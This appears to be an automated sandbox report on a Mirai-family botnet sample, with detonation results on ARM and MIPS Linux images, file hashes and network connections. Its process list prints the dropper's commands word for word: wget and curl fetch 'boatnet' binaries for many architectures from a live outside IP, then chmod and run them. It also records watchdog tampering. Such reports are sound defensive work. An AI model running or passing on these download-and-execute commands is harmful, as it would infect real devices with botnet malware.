| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
memory/1536-1-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1544-2-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1552-3-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1560-4-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1568-5-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1576-6-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1584-7-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1592-8-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1600-9-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1608-10-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1622-11-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1632-12-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1644-13-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1660-14-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1680-15-0x0000000008048000-0x00000000080547a0-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-armhf-20240418-en
Max time kernel
139s
Max time network
144s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/588/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/822/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/639/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/767/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/848/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/586/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/644/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/830/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/856/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/631/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/829/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/588/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/573/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/637/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/638/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/673/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/816/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/637/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/807/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/673/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/638/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/639/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/573/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/594/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/594/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/763-1-0x00008000-0x0001dca4-memory.dmp
memory/784-2-0x00008000-0x0001b6e4-memory.dmp
memory/801-3-0x00008000-0x000228c4-memory.dmp
memory/806-4-0x00008000-0x00026464-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-mipsbe-20240611-en
Max time kernel
148s
Max time network
141s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/677/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/759/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/782/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/794/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/813/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/668/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/671/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/824/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/687/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/750/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/757/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/818/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/717/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/855/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/709/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/826/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/701/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/702/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/784/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/808/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/760/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/827/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/851/cmdline | /tmp/WTF | N/A |
